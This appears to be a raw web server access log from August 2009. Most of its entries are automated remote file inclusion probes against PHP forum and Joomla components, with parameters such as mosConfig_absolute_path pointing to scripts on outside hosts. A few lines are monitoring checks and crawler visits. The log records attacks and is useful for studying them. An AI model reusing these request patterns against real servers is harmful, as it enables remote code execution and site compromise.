219.85.63.226 - - [12/Aug/2009:06:10:24 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:24 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:24 -0400] "GET /logs/access_log.Q109061900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:25 -0400] "GET /logs/access_log.Q109062900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:28 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:28 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:28 -0400] "GET /logs/access_log.Q109061900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:28 -0400] "GET /logs/access_log.Q109062900%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:31 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:31 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:31 -0400] "GET /logs/access_log.Q109062800/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:06:10:33 -0400] "GET /logs/access_log.Q109072200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:06:10:34 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:10:43 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:10:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [12/Aug/2009:06:11:04 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:06:11:05 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:11:38 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:11:38 -0400] "GET /logs/access_log.Q109062800/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:11:38 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Aug/2009:06:11:45 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.taraxacum.nl/htdocs//cache/z1?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:06:13:55 -0400] "GET /logs/access_log.Q109062900%20%20//?sIncPath=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.125.66.59 - - [12/Aug/2009:06:14:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
61.100.186.87 - - [12/Aug/2009:06:15:01 -0400] "GET /logs/access_log.Q109062900//?sIncPath=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.232.140.170 - - [12/Aug/2009:06:15:15 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/errors.php?error=http://rizqi.webng.com/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.30.81.182 - - [12/Aug/2009:06:15:20 -0400] "GET /logs/access_log.Q109052800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.65 - - [12/Aug/2009:06:15:27 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [12/Aug/2009:06:16:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.122.158.207 - - [12/Aug/2009:06:19:44 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:19:44 -0400] "GET /logs/error_log.Q109062700%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:19:44 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:20:23 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:20:32 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:20:32 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:20:32 -0400] "GET //skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:06:20:33 -0400] "GET //skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:06:20:33 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:06:20:33 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:21:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.122.158.207 - - [12/Aug/2009:06:21:27 -0400] "GET /logs/error_log.Q109061400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
67.15.225.39 - - [12/Aug/2009:06:21:35 -0400] "GET /logs/errors.php?error=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
67.15.225.39 - - [12/Aug/2009:06:21:35 -0400] "GET /logs/access_log.Q109070900/errors.php?error=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
67.15.225.39 - - [12/Aug/2009:06:21:35 -0400] "GET /errors.php?error=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
116.122.158.207 - - [12/Aug/2009:06:21:41 -0400] "GET /logs/access_log.Q109071100%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:21:42 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:06:21:50 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Aug/2009:06:21:50 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Aug/2009:06:21:50 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
116.122.158.207 - - [12/Aug/2009:06:21:52 -0400] "GET /logs/access_log.Q109072000%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:22:43 -0400] "GET /logs/access_log.Q109060800%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:00 -0400] "GET /logs/access_log.Q109070200%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
67.15.225.39 - - [12/Aug/2009:06:23:04 -0400] "GET /logs/error_log.Q109070900/errors.php?error=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
116.122.158.207 - - [12/Aug/2009:06:23:05 -0400] "GET /logs/error_log.Q109051600%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:15 -0400] "GET /logs/error_log.Q109062400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:15 -0400] "GET /logs/error_log.Q109060800%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:15 -0400] "GET /logs/error_log.Q109060700%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:25 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:23:32 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:23:53 -0400] "GET /logs/error_log.Q109052400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:23:54 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:06:24:03 -0400] "GET /logs/access_log.Q109070800/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
116.122.158.207 - - [12/Aug/2009:06:24:08 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:24:13 -0400] "GET /logs/error_log.Q109071900%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:24:13 -0400] "GET /logs/error_log.Q109071100%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:24:13 -0400] "GET /logs/error_log.Q109060400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:06:25:29 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_extcalendar/errors.php?error=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Aug/2009:06:25:29 -0400] "GET /administrator/components/com_extcalendar/errors.php?error=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Aug/2009:06:25:29 -0400] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.232.140.170 - - [12/Aug/2009:06:26:03 -0400] "GET /administrator/components/com_extcalendar/errors.php?error=http://rizqi.webng.com/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:26:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.245.138.143 - - [12/Aug/2009:06:26:49 -0400] "GET /logs/access_log.Q109072900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:26:49 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:26:49 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:27:01 -0400] "GET /logs/access_log.Q109080500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:06:27:35 -0400] "GET /logs/access_log.Q109070800/administrator/components/com_extcalendar/errors.php?error=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
119.245.138.143 - - [12/Aug/2009:06:28:23 -0400] "GET /logs/access_log.Q109072900////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:28:27 -0400] "GET /logs/access_log.Q109080500////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:28:42 -0400] "GET /logs/access_log.Q109051000////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:30:05 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
218.27.203.107 - - [12/Aug/2009:06:30:06 -0400] "GET /?DOCUMENT_ROOT=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
218.27.203.107 - - [12/Aug/2009:06:30:07 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 200 13344 "-" "libwww-perl/5.79"
117.110.74.195 - - [12/Aug/2009:06:30:40 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:30:40 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:30:40 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:30:53 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:31:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.122.158.207 - - [12/Aug/2009:06:31:16 -0400] "GET /logs/error_log.Q109062700///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:06:31:23 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:31:28 -0400] "GET /logs/error_log.Q109061700/?DOCUMENT_ROOT=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
91.121.83.177 - - [12/Aug/2009:06:31:28 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:31:28 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:31:28 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13344 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:31:28 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:31:28 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:31:29 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13344 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/access_log.Q109080500/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/access_log.Q109080500/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/access_log.Q109080500/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:01 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:02 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:16 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:16 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:32:17 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:32:25 -0400] "GET /logs/access_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:32:27 -0400] "GET /logs/access_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:32:29 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.189.113.234 - - [12/Aug/2009:06:32:58 -0400] "GET /logs/access_log.Q109071300////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.189.113.234 - - [12/Aug/2009:06:32:58 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
91.189.113.234 - - [12/Aug/2009:06:32:58 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:33:02 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.189.113.234 - - [12/Aug/2009:06:33:03 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:33:03 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:33:35 -0400] "GET /logs/access_log.Q109072000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:44 -0400] "GET /config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:44 -0400] "GET /logs/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:44 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:45 -0400] "GET /logs/access_log.Q109072700%20%20/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
